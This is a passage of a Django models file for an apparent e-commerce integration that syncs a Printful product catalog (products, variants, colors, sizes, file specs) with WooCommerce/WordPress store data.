pfSyncProduct = ForeignKey('business.pfSyncProduct',
verbose_name=_("Sync Product"),
blank=True, null=True, )
colors = ManyToManyField('business.pfCatalogColor',
blank=True, verbose_name=_("Colors"))
sizes = ManyToManyField('business.pfCatalogSize',
blank=True, verbose_name=_("Sizes"))
class Meta:
ordering = ('code',)
verbose_name = _("Product")
verbose_name_plural = _("Products")
def __str__(self):
return self.get_friendly_name()
def get_friendly_name(self):
if self.code and self.name:
return "{} - {}".format(self.code, self.name)
elif self.name:
return "{}".format(self.name)
return "Unknown Product"
def __unicode__(self):
return self.__str__
def get_absolute_url(self):
return reverse('business:business_bzproduct_detail', args=(self.pk,))
def get_update_url(self):
return reverse('business:business_bzproduct_update', args=(self.pk,))
def get_variants(self):
return bzProductVariant.objects.filter(bzproduct=self)
get_variants.short_description = _("Variants")
def num_variants(self):
return self.get_variants().count()
num_variants.short_description = _("Variants")
def get_colors_as_string(self):
rv = []
for i in self.colors.all():
rv.append(i.__str__())
return ", ".join(rv)
def get_sizes_as_string(self):
rv = []
for i in self.sizes.all():
rv.append(i.__str__())
return ", ".join(rv)
class bzProductVariant(commonBusinessModel):
# Fields
code = CharField(verbose_name=_("Code"), max_length=64,
default="", blank=True, null=True)
is_active = BooleanField(verbose_name=_("Is Active"), default=True)
# Relationship Fields
bzproduct = ForeignKey('business.bzProduct', verbose_name=_("Product"))
pfcatalogvariant = ForeignKey(
'business.pfCatalogVariant', verbose_name=_("Vendor Variant"), )
pfcolor = ForeignKey('business.pfCatalogColor',
verbose_name=_("Color"), blank=True, null=True, )
pfsize = ForeignKey('business.pfCatalogSize',
verbose_name=_("Size"), blank=True, null=True, )
price = DecimalField(_("Price"), max_digits=5,
decimal_places=2, default=Decimal("0"))
class Meta:
ordering = ('bzproduct', 'pfsize', 'pfcolor',)
verbose_name = _("Variant")
verbose_name_plural = _("Variants")
def __str__(self):
rv = []
if self.bzproduct.code:
rv.append(self.bzproduct.code)
if self.bzproduct:
rv.append(self.bzproduct.name)
return " - ".join(rv)
def get_absolute_url(self):
return reverse('business:business_bzproductvariant_detail',
args=(self.pk,))
def get_update_url(self):
return reverse('business:business_bzproductvariant_update',
args=(self.pk,))
class wooAttribute(commonBusinessModel):
TYPE_TEXT = "text"
TYPE_COLORPICKER = "color picker"
TYPE_IMAGESELECT = "image select"
TYPE_TEXTLABEL = "text label"
TYPE_CHOICES = (
(TYPE_TEXT, _("Basic Text")),
(TYPE_COLORPICKER, _("Color Picker")),
(TYPE_IMAGESELECT, _("Image Select")),
(TYPE_TEXTLABEL, _("Text Label")),
)
ORDER_NAME = "name"
ORDER_NAMENUMBER = "name_num"
ORDER_ID = "id"
ORDER_MENU = "menu_order"
ORDER_CHOICES = (
(ORDER_NAME, _("Sort by Name")),
(ORDER_NAMENUMBER, _("Sort by Name (Number)")),
(ORDER_ID, _("Sort by ID")),
(ORDER_MENU, _("Sort by Custom Menu Order")),
)
# Fields
is_active = BooleanField(_("Is Active?"), default=True)
wid = CharField(_("WP ID"), max_length=16,
default="", blank=True, null=True)
name = CharField(_("Name"), max_length=255,
default="", blank=True, null=True)
slug = CharField(_("Slug"), max_length=255,
default="", blank=True, null=True)
type = CharField(_("Type"), max_length=255, default="",
blank=True, null=True, choices=TYPE_CHOICES)
has_archives = BooleanField(_("Has Archives?"), default=False)
# Relationship Fields
store = ForeignKey('business.wooStore', blank=True, null=True)
class Meta:
ordering = ('-pk',)
verbose_name = _("WP Attribute")
verbose_name_plural = _("WP Attributes")
def __str__(self):
return u'%s' % self.slug
def get_absolute_url(self):
return reverse('business:business_wooattribute_detail',
args=(self.slug,))
def get_update_url(self):
return reverse('business:business_wooattribute_update',
args=(self.slug,))
class wooCategory(commonBusinessModel):
DISPLAY_DEFAULT = 'default'
DISPLAY_PRODUCTS = 'products'
DISPLAY_SUBCATEGORIES = 'subcategories'
DISPLAY_BOTH = 'both'
DISPLAY_CHOICES = (
(DISPLAY_DEFAULT, _("Default")),
(DISPLAY_PRODUCTS, _("Products")),
(DISPLAY_SUBCATEGORIES, _("Subcategories")),
(DISPLAY_BOTH, _("Display Both"))
)
# Fields
is_active = BooleanField(_("Is Active?"), default=True)
wid = IntegerField(_("WP ID"), default=0, blank=True, null=True)
name = CharField(_("Name"), max_length=255,
default="", blank=True, null=True)
slug = CharField(_("Slug"), max_length=255,
default="", blank=True, null=True)
parent = IntegerField(_("Parent ID"), default=0)
description = TextField(
_("Description"), default="", blank=True, null=True)
display = CharField(_("Display"), max_length=255,
default=DISPLAY_DEFAULT, choices=DISPLAY_CHOICES)
count = IntegerField(_("Count"), default=0)
image_id = IntegerField(_("Image ID"), default=0)
image_date_created = CharField(_("Image Created"), max_length=255,
default="", blank=True, null=True)
# Relationship Fields
store = ForeignKey('business.wooStore', blank=True, null=True)
class Meta:
ordering = ('-pk',)
verbose_name = _("WP Category")
verbose_name_plural = _("WP Categories")
def __str__(self):
return u'%s' % self.slug
def get_absolute_url(self):
return reverse('business:business_woocategory_detail',
args=(self.slug,))
def get_update_url(self):
return reverse('business:business_woocategory_update',
args=(self.slug,))
class wooImage(commonBusinessModel):
# Fields
is_active = BooleanField(_("Is Active?"), default=True)
wid = CharField(_("WP ID"), max_length=16, default="", blank=True,
null=True, help_text=_(
"Image ID (attachment ID). In write-mode used to attach pre-existing images."))
date_created = DateField(_("Date Created"), help_text=_(
"READONLY. The date the product was created, in the sites timezone."),
blank=True, null=True)
alt = CharField(_("Alt"), max_length=255,
default="", blank=True, null=True)
position = IntegerField(_("Position"), default=0, help_text=_(
"Image position. 0 means that the image is featured."))
class Meta:
ordering = ('-pk',)
verbose_name = _("WP Image")
verbose_name_plural = _("WP Images")
def __str__(self):
return u'%s' % self.pk
def get_absolute_url(self):
return reverse('business:business_wooimage_detail', args=(self.pk,))
def get_update_url(self):
return reverse('business:business_wooimage_update', args=(self.pk,))
class wooProduct(commonBusinessModel):
# Fields
is_active = BooleanField(_("Is Active?"), default=True)
wid = CharField(_("WP ID"), max_length=16,
default="", blank=True, null=True, )
slug = CharField(_("Slug"), max_length=255,
default="", blank=True, null=True)
permalink = URLField(_("Permalink"), blank=True)
date_created = DateField(_("Date Created"), help_text=_(
"READONLY. The date the product was created, in the sites timezone."),
blank=True, null=True)
dimension_length = DecimalField(
_("Length"), max_digits=10, decimal_places=2, default=0)
dimension_width = DecimalField(
_("Width"), max_digits=10, decimal_places=2, default=0)
dimension_height = DecimalField(
_("Height"), max_digits=10, decimal_places=2, default=0)
weight = DecimalField(_("Weight"), help_text=_(
"Product weight in decimal format."),
max_digits=10, decimal_places=2,
default=0)
reviews_allowed = BooleanField(_("Reviewed Allowed?"), help_text=_(
"Allow reviews. Default is true."), default=True)
# Relationship Fields
woostore = ForeignKey('business.wooStore', verbose_name=_(
"Store"), blank=True, null=True)
shipping_class = ForeignKey(
'business.wooShippingClass', null=True, blank=True)
tags = ManyToManyField(
'business.wooTag', verbose_name=_("Tags"), blank=True)
images = ManyToManyField(
'business.wooImage', verbose_name=_("Images"), blank=True)
class Meta:
ordering = ('-pk',)
verbose_name = _("WP Product")
verbose_name_plural = _("WP Products")
def __str__(self):
return u'%s' % self.slug
def get_absolute_url(self):
return reverse('business:business_wooproduct_detail',
args=(self.slug,))
def get_update_url(self):
return reverse('business:business_wooproduct_update',
args=(self.slug,))
class wooShippingClass(commonBusinessModel):
# Fields
wid = CharField(_("WP ID"), max_length=64,
default="", blank=True, null=True)
name = CharField(_("Name"), max_length=255,
default="", blank=True, null=True)
slug = CharField(_("Slug"), max_length=255,
default="", blank=True, null=True)
description = TextField(
_("Description"), default="", blank=True, null=True)
count = IntegerField(_("Count"), default=0)
class Meta:
ordering = ('-pk',)
verbose_name = _("WP Shipping Class")
verbose_name_plural = _("WP Shipping Classes")
def __str__(self):
return u'%s' % self.slug
def get_absolute_url(self):
return reverse(
'business:business_wooshippingclass_detail', args=(self.pk,))
def get_update_url(self):
return reverse(
'business:business_wooshippingclass_update', args=(self.pk,))
class wooTag(commonBusinessModel):
# Fields
is_active = BooleanField(_("Is Active?"), default=True)
wid = IntegerField(_("WP ID"), default=0)
name = CharField(_("Name"), max_length=255,
default="", blank=True, null=True)
slug = CharField(_("Slug"), max_length=255,
default="", blank=True, null=True)
description = TextField(
_("Description"), default="", blank=True, null=True)
count = IntegerField(_("Count"), default=0)
# Relationship Fields
store = ForeignKey('business.wooStore', blank=True, null=True)
class Meta:
ordering = ('-pk',)
verbose_name = _("WP Tag")
verbose_name_plural = _("WP Tags")
def __str__(self):
return u'%s' % self.slug
def get_absolute_url(self):
return reverse('business:business_wootag_detail', args=(self.slug,))
def get_update_url(self):
return reverse('business:business_wootag_update', args=(self.slug,))
class wooTerm(commonBusinessModel):
# Fields
wid = CharField(_("WP ID"), max_length=16,
default="", blank=True, null=True)
name = CharField(_("Name"), max_length=255,
default="", blank=True, null=True)
slug = CharField(_("Slug"), max_length=255,
default="", blank=True, null=True)
menu_order = IntegerField(_("Menu Order"), default=0)
count = IntegerField(_("Count"), default=0)
wr_tooltip = CharField(_("WR Tooltip"), max_length=255,
default="", blank=True, null=True)
wr_label = CharField(_("WR Label"), max_length=255,
default="", blank=True, null=True)
# Relationship Fields
productattribute = ForeignKey('business.wooAttribute', verbose_name=_(
"Product Attribute"), blank=True, null=True)
class Meta:
ordering = ('-pk',)
verbose_name = _("WP Term")
verbose_name_plural = _("WP Terms")
def __str__(self):
return u'%s' % self.slug
def get_absolute_url(self):
return reverse('business:business_wooterm_detail', args=(self.slug,))
def get_update_url(self):
return reverse('business:business_wooterm_update', args=(self.slug,))
class wooVariant(commonBusinessModel):
# Fields
is_active = BooleanField(_("Is Active?"), default=True)
wid = CharField(_("WP ID"), max_length=16,
default="", blank=True, null=True, )
date_created = DateField(_("Date Created"), help_text=_(
"READONLY. The date the product was created, in the sites timezone."), blank=True, null=True)
permalink = URLField(_("Permalink"), blank=True)
sku = CharField(_("SKU"), help_text=_("Unique identifier."),
max_length=255, default="", blank=True, null=True)
price = CharField(_("Price"), help_text=_(
"READONLY. Current product price. This is set from regular_price and sale_price."), max_length=255, default="", blank=True, null=True)
dimension_length = DecimalField(
_("Length"), max_digits=10, decimal_places=2, default=0)
dimension_width = DecimalField(
_("Width"), max_digits=10, decimal_places=2, default=0)
dimension_height = DecimalField(
_("Height"), max_digits=10, decimal_places=2, default=0)
weight = DecimalField(_("Weight"), help_text=_(
"Product weight in decimal format."), max_digits=10, decimal_places=2, default=0)
# Relationship Fields
shipping_class = ForeignKey(
'business.wooShippingClass', null=True, blank=True)
images = ManyToManyField(
'business.wooImage', verbose_name=_("Images"), blank=True)
class Meta:
ordering = ('-pk',)
verbose_name = _("WP Variant")
verbose_name_plural = _("WP Variants")
def __str__(self):
return u'%s' % self.pk
def get_absolute_url(self):
return reverse('business:business_woovariant_detail', args=(self.pk,))
def get_update_url(self):
return reverse('business:business_woovariant_update', args=(self.pk,))
class wpMedia(commonBusinessModel):
STATUSBOOL_OPEN = 'open'
STATUSBOOL_CLOSED = 'closed'
STATUSBOOL_CHOICES = (
(STATUSBOOL_OPEN, _("Open")),
(STATUSBOOL_CLOSED, _("Closed")),
)
MEDIATYPE_IMAGE = "image"
MEDIATYPE_FILE = "file"
MEDIATYPE_CHOICES = (
(MEDIATYPE_IMAGE, _("Image")),
(MEDIATYPE_FILE, )
)
# Fields
is_active = BooleanField(_("Is Active?"), default=True)
alt_text = CharField(_("Alternate Text"), max_length=255,
default="", blank=True, null=True)
width = IntegerField(_("Width"), default=0)
height = IntegerField(_("Height"), default=0)
file = CharField(_("File"), max_length=255,
default="", blank=True, null=True)
author = IntegerField(_("Author"), default=0)
mime_type = CharField(_("MIME Type"), max_length=255,
default="", blank=True, null=True)
comment_status = CharField(_("Comment Status"), max_length=255,
default=STATUSBOOL_OPEN, choices=STATUSBOOL_CHOICES)
wid = CharField(_("ID"), max_length=16, default="", blank=True, null=True)
source_url = URLField(_("Source URL"), blank=True, null=True)
template = CharField(_("Template"), max_length=255,
default="", blank=True, null=True)
ping_status = CharField(_("Ping Status"), max_length=255,
default=STATUSBOOL_OPEN, choices=STATUSBOOL_CHOICES)
caption = CharField(_("Caption"), max_length=255,
default="", blank=True, null=True)
link = URLField(_("Link"), default="", blank=True, null=True)
slug = CharField(_("Slug"), max_length=255, blank=True, null=True)
modified = DateTimeField(_("Modified"), blank=True, null=True)
guid = CharField(_("GUID"), max_length=255,
default="", blank=True, null=True)
description = TextField(
_("Description"), default="", blank=True, null=True)
modified_gmt = DateTimeField(_("Modified GMT"), blank=True, null=True)
title = CharField(_("Title"), max_length=255,
default="", blank=True, null=True)
date_gmt = DateTimeField(_("Date GMT"), blank=True, null=True)
type = CharField(_("Type"), max_length=64,
default="", blank=True, null=True)
# Relationship Fields
woostore = ForeignKey('business.woostore', blank=True, null=True)
class Meta:
ordering = ('-pk',)
verbose_name = _("WP Media")
verbose_name_plural = _("WP Media")
def __str__(self):
return u'%s' % self.slug
def get_absolute_url(self):
return reverse('business:business_wpmedia_detail', args=(self.slug,))
def get_update_url(self):
return reverse('business:business_wpmedia_update', args=(self.slug,))
class wpMediaSize(commonBusinessModel):
# Fields
is_active = BooleanField(_("Is Active?"), default=True)
name = CharField(_("Name"), max_length=255,
default="", blank=True, null=True)
file = CharField(_("File"), max_length=255,
default="", blank=True, null=True)
mime_type = CharField(_("MIME Type"), max_length=255,
default="", blank=True, null=True)
width = IntegerField(_("Width"), default=0)
height = IntegerField(_("Height"), default=0)
source_url = URLField(_("Source URL"), default="", blank=True, null=True)
# Relationship Fields
wpmedia = ForeignKey('business.wpMedia', verbose_name=_("Media"))
class Meta:
ordering = ('-pk',)
verbose_name = _("WP Media Size")
verbose_name_plural = _("WP Media Sizes")
def __str__(self):
return u'%s' % self.pk
def get_absolute_url(self):
return reverse('business:business_wpmediasize_detail', args=(self.pk,))
def get_update_url(self):
return reverse('business:business_wpmediasize_update', args=(self.pk,))
class pfCountry(commonBusinessModel):
# Fields
code = CharField(_("Code"), max_length=50,
default="", blank=True, null=True)
name = CharField(_("Name"), max_length=255,
default="", blank=True, null=True)
class Meta:
ordering = ('code',)
verbose_name = _("Country")
verbose_name_plural = _("Countries")
def __str__(self):
if self.code and self.name:
return "{} - {}".format(self.code, self.name)
elif self.name:
return "{}".format(self.name)
return _("Unknown Country")
def get_absolute_url(self):
return reverse('business:business_pfcountry_detail', args=(self.pk,))
def get_update_url(self):
return reverse('business:business_pfcountry_update', args=(self.pk,))
@staticmethod
def api_pull(store=None, key=None):
"""
Update the Country and State objects from the Printful API.
:param store: Optional bzStore object. If not provided, method will
attempt to use the first store from the database if it exists.
:param key: If a key is provided, then it is used instead of store.
This is especially useful for when you're first creating a
store, and so avoids a race condition.
"""
if key:
api = pyPrintful(key=key)
else:
_storeObj = pfStore.get_store(store)
api = pyPrintful(key=_storeObj.key)
countries = api.get_countries_list()
for c in countries:
cObj, cCreated = pfCountry.objects.update_or_create(
code=c['code'],
defaults={
'name': c['name']
}
)
if c['states']:
for s in c['states']:
sObj, sCreated = pfState.objects.update_or_create(
code=s['code'],
pfcountry=cObj,
defaults={
'name': s['name'],
}
)
def get_states(self):
return pfState.objects.filter(pfcountry=self)
get_states.short_description = _("States")
def num_states(self):
return self.get_states().count()
num_states.short_description = _("States")
class pfState(commonBusinessModel):
# Fields
code = CharField(_("Code"), max_length=50,
default="", blank=True, null=True)
name = CharField(_("Name"), max_length=255,
default="", blank=True, null=True)
# Relationship Fields
pfcountry = ForeignKey('business.pfCountry', verbose_name=_("Country"))
class Meta:
ordering = ('pfcountry__code', 'code',)
verbose_name = _("State")
verbose_name_plural = _("States")
def __str__(self):
if self.code and self.name:
return "{} - {}".format(self.code, self.name)
elif self.name:
return "{}".format(self.name)
return _("Unknown State")
def get_absolute_url(self):
return reverse('business:business_pfstate_detail', args=(self.pk,))
def get_update_url(self):
return reverse('business:business_pfstate_update', args=(self.pk,))
class pfSyncProduct(commonBusinessModel):
# Fields
pid = CharField(_("Printful ID"), max_length=200,
default="", blank=True, null=True)
external_id = CharField(_("External ID"), max_length=200,
default="", blank=True, null=True)
variants = IntegerField(_("Variant Count"), default=0)
synced = IntegerField(_("Synced"), default=0)
# Relationship Fields
pfstore = ForeignKey('business.pfStore', verbose_name=_("Store"))
class Meta:
ordering = ('-pk',)
verbose_name = _("Sync Product")
verbose_name_plural = _("Sync Products")
def __str__(self):
return u'%s' % self.pk
def get_absolute_url(self):
return reverse('business:business_pfsyncproduct_detail',
args=(self.pk,))
def get_update_url(self):
return reverse('business:business_pfsyncproduct_update',
args=(self.pk,))
class pfSyncVariant(commonBusinessModel):
# Fields
pid = CharField(_("Printful ID"), max_length=200,
default="", blank=True, null=True)
external_id = CharField(_("External ID"), max_length=200,
default="", blank=True, null=True)
synced = BooleanField(_("Synced"), default=False)
# Relationship Fields
pfsyncproduct = ForeignKey(
'business.pfSyncProduct', verbose_name=_("Sync Product"))
files = ManyToManyField('business.pfPrintFile', blank=True)
class Meta:
ordering = ('-pk',)
verbose_name = _("Sync Variant")
verbose_name_plural = _("Sync Variants")
def __str__(self):
return u'%s' % self.pk
def get_absolute_url(self):
return reverse('business:business_pfsyncvariant_detail',
args=(self.pk,))
def get_update_url(self):
return reverse('business:business_pfsyncvariant_update',
args=(self.pk,))
class pfSyncItemOption(commonBusinessModel):
# Fields
pid = CharField(_("Printful ID"), max_length=200,
default="", blank=True, null=True)
value = CharField(_("Value"), max_length=255,
default="", blank=True, null=True)
# Relationship Fields
pfsyncvariant = ForeignKey('business.pfSyncVariant', )
class Meta:
ordering = ('-pk',)
verbose_name = _("Sync Item Option")
verbose_name_plural = _("Sync Item Options")
def __str__(self):
return u'%s' % self.pk
def get_absolute_url(self):
return reverse(
'business:business_pfsyncitemoption_detail', args=(self.pk,))
def get_update_url(self):
return reverse(
'business:business_pfsyncitemoption_update', args=(self.pk,))
class pfCatalogColor(commonBusinessModel):
# Fields
code = CharField(_("Code"), max_length=3,
default="", blank=True, null=True)
name = CharField(_("Color"), max_length=255,
default="", blank=True, null=True)
label_clean = CharField(_("Clean Label"), max_length=255,
default="", blank=True, null=True)
hex_code = CharField(_("Color Hex Code"), max_length=255,
default="", blank=True, null=True)
class Meta:
ordering = ('-pk',)
verbose_name = _("Printful Color")
verbose_name_plural = _("Printful Colors")
def __str__(self):
rv = []
if self.code:
rv.append(self.code)
if self.label_clean:
rv.append(self.label_clean)
elif self.name:
rv.append(self.name)
if rv:
return " - ".join(rv)
return _("Unknown Color")
def get_absolute_url(self):
return reverse(
'business:business_pfcatalogcolor_detail', args=(self.pk,))
def get_update_url(self):
return reverse(
'business:business_pfcatalogcolor_update', args=(self.pk,))
def get_hex_code_clean(self):
return self.hex_code.replace("#", "")
class pfCatalogSize(commonBusinessModel):
# Fields
code = CharField(_("Code"), max_length=3,
default="", blank=True, null=True)
name = CharField(_("Size"), max_length=255,
default="", blank=True, null=True)
label_clean = CharField(_("Clean Label"), max_length=255,
default="", blank=True, null=True)
sort_group = CharField(_("Sort Group"), max_length=2,
default="", blank=True, null=True)
sort_order = CharField(_("Sort Order"), max_length=16,
default="", blank=True, null=True)
class Meta:
ordering = ('sort_group', 'sort_order',)
verbose_name = _("Printful Size")
verbose_name_plural = _("Printful Sizes")
def __str__(self):
rv = []
if self.code:
rv.append(self.code)
if self.label_clean:
rv.append(self.label_clean)
elif self.name:
rv.append(self.name)
if rv:
return " - ".join(rv)
return _("Unknown Size")
def get_absolute_url(self):
return reverse('business:business_pfcatalogsize_detail',
args=(self.pk,))
def get_update_url(self):
return reverse('business:business_pfcatalogsize_update',
args=(self.pk,))
class pfCatalogFileSpec(commonBusinessModel):
COLORSYSTEM_RGB = 'R'
COLORSYSTEM_CMYK = 'Y'
COLORSYSTEM_CHOICES = (
(COLORSYSTEM_RGB, "RGB"),
(COLORSYSTEM_CMYK, "CMYK"),
)
# Fields
name = CharField(_("Name"), max_length=5,
default="", blank=True, null=True)
note = TextField(_("Note"), default="", blank=True, null=True)
width = IntegerField(_("Width"), default=0)
height = IntegerField(_("Height"), default=0)
width_in = DecimalField(_("Width (in)"), default=0,
decimal_places=2, max_digits=4)
height_in = DecimalField(_("Height (in)"), default=0,
decimal_places=2, max_digits=4)
ratio = CharField(_("Ratio"), max_length=32,
default="", blank=True, null=True)
colorsystem = CharField(_("Color System"), max_length=1,
default="R", choices=COLORSYSTEM_CHOICES)
class Meta:
ordering = ('name',)
verbose_name = _("Printful File Spec")
verbose_name_plural = _("Printful File Specs")
def __str__(self):
if self.name:
return self.name
return _("Unknown File Spec")
def get_absolute_url(self):
return reverse(
'business:business_pfcatalogfilespec_detail', args=(self.pk,))
def get_update_url(self):
return reverse(
'business:business_pfcatalogfilespec_update', args=(self.pk,))
def save(self, *args, **kwargs):
if self.width and not self.width_in:
self.width_in = int(self.width / 300)
elif self.width_in and not self.width:
self.width = self.width_in * 300
if self.height and not self.height_in:
self.height_in = int(self.height / 300)
elif self.height_in and not self.height:
self.height = self.height_in * 300
# This should prevent ZeroDivisionError exceptions.
if not self.ratio and self.width and self.height:
_fraction = Fraction(int(self.width), int(self.height))
self.ratio = "{}:{}".format(
_fraction.numerator, _fraction.denominator)
super(pfCatalogFileSpec, self).save(*args, **kwargs)
class pfCatalogFileType(commonBusinessModel):
# Fields
pid = CharField(_("Printful ID"), max_length=255,
default="", blank=True, null=True)
title = CharField(_("Title"), max_length=255,
default="", blank=True, null=True)
additional_price = CharField(_("Additional Price"), max_length=100,
default="", blank=True, null=True)
# Relationship Fields
pfcatalogvariant = ForeignKey(
'business.pfCatalogVariant', verbose_name=_("Variant"))
class Meta:
ordering = ('-pk',)
verbose_name = _("Printful File Type")
verbose_name_plural = _("Printful File Types")
def __str__(self):
return u'%s' % self.pk
def get_absolute_url(self):
return reverse(
'business:business_pfcatalogfiletype_detail', args=(self.pk,))
def get_update_url(self):
return reverse(
'business:business_pfcatalogfiletype_update', args=(self.pk,))
class pfCatalogOptionType(commonBusinessModel):
# Fields
pid = CharField(_("Printful ID"), max_length=255,
default="", blank=True, null=True)
title = CharField(_("Title"), max_length=255,
default="", blank=True, null=True)
type = CharField(_("Type"), max_length=255,
default="", blank=True, null=True)
additional_price = CharField(_("Additional Price"), max_length=100,
default="", blank=True, null=True)
# Relationship Fields
pfcatalogvariant = ForeignKey('business.pfCatalogVariant', )
class Meta:
ordering = ('-pk',)
verbose_name = _("Printful Option Type")
verbose_name_plural = _("Printful Option Types")
def __str__(self):
return u'%s' % self.pk
def get_absolute_url(self):
return reverse(
'business:business_pfcatalogoptiontype_detail', args=(self.pk,))
def get_update_url(self):
return reverse(
'business:business_pfcatalogoptiontype_update', args=(self.pk,))
class pfCatalogBrand(commonBusinessModel):
name = CharField(_("Name"), max_length=128,
null=True, blank=True, default="")
def __str__(self):
if self.name:
return self.name
return "Unknown Brand"
class Meta:
ordering = ('-pk',)
verbose_name = _("Catalog Brand")
verbose_name_plural = _("Catalog Brands")
class pfCatalogType(commonBusinessModel):
name = CharField(_("Name"), max_length=128,
null=True, blank=True, default="")
def __str__(self):
if self.name:
return self.name
return "Unknown Type"
class Meta:
ordering = ('-pk',)
verbose_name = _("Catalog Product Type")
verbose_name_plural = _("Catalog Product Types")
class pfCatalogProduct(commonBusinessModel):
# Fields
is_active = BooleanField(_("Is Active?"), default=True)
pid = CharField(_("Printful ID"), max_length=255,
default="", blank=True, null=True)
ptype = ForeignKey('business.pfCatalogType', blank=True, null=True)
brand = ForeignKey('business.pfCatalogBrand', blank=True, null=True)
model = CharField(_("Model"), max_length=255,
default="", blank=True, null=True)
image = CharField(_("Image"), max_length=255,
default="", blank=True, null=True)
variant_count = IntegerField(_("Variants"), default=0)
class Meta:
ordering = ('brand', 'model')
verbose_name = _("Printful Product")
verbose_name_plural = _("Printful Products")
def __str__(self):
return self.get_friendly_name()
def get_friendly_name(self):
if self.pid and self.brand and self.brand:
return "{} / {} ({})".format(self.brand, self.model, self.pid)
return "Unknown Product"
def get_absolute_url(self):
return reverse(
'business:business_pfcatalogproduct_detail', args=(self.pk,))
def get_update_url(self):
return reverse(
'business:business_pfcatalogproduct_update', args=(self.pk,))
def get_variants(self):
return pfCatalogVariant.objects.filter(pfcatalogproduct=self)
get_variants.short_description = _("Variants")
def get_colors(self):
"""
Get all color objects associated with this product's variants.
"""
return pfCatalogColor.objects.filter(pfcatalogvariant__in=self.get_variants()).distinct()
get_colors.short_description = _("Colors")
def get_colors_as_string(self):
c = self.get_colors()
if c:
rv = ", ".join([v.label for v in c])
else:
rv = "-"
return rv
get_colors_as_string.short_description = _("Available Colors")
def num_colors(self):
return self.get_colors().count()
num_colors.short_description = _("Colors")
def get_sizes(self):
return pfCatalogSize.objects.filter(pfcatalogvariant__in=self.get_variants()).distinct()
get_sizes.short_description = _("Sizes")
def get_sizes_as_string(self):
s = self.get_sizes()
if s:
rv = ", ".join([v.get_name() for v in s])
else:
rv = "-"
return rv
get_sizes_as_string.short_description = _("Available Sizes")
def num_sizes(self):
return self.get_sizes().count()
num_sizes.short_description = _("Sizes")
def get_out_of_stock(self):
return pfCatalogVariant.objects.filter(pfcatalogproduct=self, in_stock=False)
def num_out_of_stock(self):
return self.get_out_of_stock().count()
num_out_of_stock.short_description = _("Out of Stock")
@staticmethod
def api_pull(store=None, key=None):
"""
Update the product objects from the Printful API.
:param store: Optional bzStore object. If not provided, method will
attempt to use the first store from the database if it exists.
:param key: If a key is provided, then it is used instead of store.
This is especially useful for when you're first creating a
store, and so avoids a race condition.
"""
if key:
api = pyPrintful(key=key)
else:
_storeObj = pfStore.get_store(store)
api = pyPrintful(key=_storeObj.key)
logger.debug("pfCatalogProduct.api_pull / Making API Call")
products = api.get_product_list()
logger.debug("pfCatalogProduct.api_pull / All: is_active=False")
pfCatalogProduct.objects.all().update(is_active=False)
for p in products:
# {
# 'dimensions': {
# '16×20': '16×20',
# },
# 'options': [],
# 'files': [
# {'id': 'preview', 'title': 'Mockup', 'type': 'mockup', 'additional_price': None}
# ]}
pType, tCreated = pfCatalogType.objects.update_or_create(
name=p['type'],
defaults={}
)
pBrand, bCreated = pfCatalogBrand.objects.update_or_create(
name=p['brand'],
defaults={}
)
pObj, pCreated = pfCatalogProduct.objects.update_or_create(
pid=p['id'],
defaults={
'brand': pBrand,
'variant_count': cleanValue(p['variant_count']),
'ptype': pType,
'model': cleanValue(p['model']),
'image': cleanValue(p['image']),
'is_active': True,
}
)
logger.debug("pfCatalogProduct.api_pull / {} {}", pCreated, pObj)
# Handle 'files'
# Handle 'dimensions'
if pObj.variant_count:
variants = api.get_product_info(pObj.pid)
pfCatalogVariant.objects.all().update(is_active=False)
for p in variants['variants']:
colorObj = None
if p['color']:
colorObj, colCreated = pfCatalogColor.objects.update_or_create(
name=cleanValue(p['color']),
defaults={
'hex_code': cleanValue(p['color_code']),
}
)
sizeObj = None
if p['size']:
sizeObj, szCreated = pfCatalogSize.objects.update_or_create(
name=cleanValue(p['size']),
defaults={}
)
vObj, vCreated = pfCatalogVariant.objects.update_or_create(
pid=p['id'],
pfcatalogproduct=pObj,
defaults={
'name': cleanValue(p['name']),
'image': cleanValue(p['image']),
'in_stock': cleanValue(p['in_stock'], False),
'price': Decimal(str(cleanValue(p['price']))),
'pfcolor': colorObj,
'pfsize': sizeObj,
}
)
# Handle 'options' (Attach to variants)
@staticmethod
def get_avail_sizes(obj):
return obj.get_sizes()
@staticmethod
def get_avail_colors(obj):
return obj.get_colors()
class pfCatalogVariant(commonBusinessModel):
# Fields
is_active = BooleanField(verbose_name=_("Is Active"), default=True)
pid = CharField(_("Printful ID"), max_length=16,
default="", blank=True, null=True)
name = CharField(_("Name"), max_length=255,
default="", blank=True, null=True)
image = CharField(_("Image"), max_length=255,
default="", blank=True, null=True)
price = CharField(_("Price"), max_length=255,
default="", blank=True, null=True)
in_stock = BooleanField(_("In Stock"), default=False)
weight = DecimalField(_("Weight (oz)"), default=0, blank=True,
null=True, decimal_places=2, max_digits=5)
# Relationship Fields
pfsize = ForeignKey('business.pfCatalogSize', blank=True,
null=True, verbose_name=_("Size"))
pfcolor = ForeignKey('business.pfCatalogColor', blank=True,
null=True, verbose_name=_("Color"))
pfcatalogproduct = ForeignKey('business.pfCatalogProduct', blank=True,
null=True, verbose_name=_("Catalog Product"))
class Meta:
ordering = ('-pk',)
verbose_name = _("Printful Variant")
verbose_name_plural = _("Printful Variants")
def __str__(self):
return u'%s' % self.pk
def get_absolute_url(self):
return reverse(
'business:business_pfcatalogvariant_detail', args=(self.pk,))
def get_update_url(self):
return reverse(
'business:business_pfcatalogvariant_update', args=(self.pk,))
class MimeType(commonBusinessModel):
name = CharField(_("Name"), max_length=255,
null=True, blank=True, default="")
clean_name = CharField(_("Friendly Name"), max_length=255,
null=True, blank=True, default="")
def __str__(self):
if self.clean_name:
return self.clean_name
if self.name:
return self.name
return "Unknown"
class Meta:
ordering = ('clean_name', 'name',)
verbose_name = _("MIME Type")
verbose_name_plural = _("MIME Types")
class pfFileType(commonBusinessModel):
name = CharField(_("Name"), max_length=255,
null=True, blank=True, default="")
clean_name = CharField(_("Friendly Name"), max_length=255,
null=True, blank=True, default="")
def __str__(self):
if self.clean_name:
return self.clean_name
if self.name:
return self.name
return "Unknown"
class Meta:
ordering = ('clean_name', 'name',)
verbose_name = _("File Type")
verbose_name_plural = _("File Types")
class pfFileStatus(commonBusinessModel):
name = CharField(_("Name"), max_length=255,
null=True, blank=True, default="")
clean_name = CharField(_("Friendly Name"), max_length=255,
null=True, blank=True, default="")
def __str__(self):
if self.clean_name:
return self.clean_name
if self.name:
return self.name
return "Unknown"
class Meta:
ordering = ('clean_name', 'name',)
verbose_name = _("File Status")
verbose_name_plural = _("File Statuses")
class pfPrintFile(commonBusinessModel):
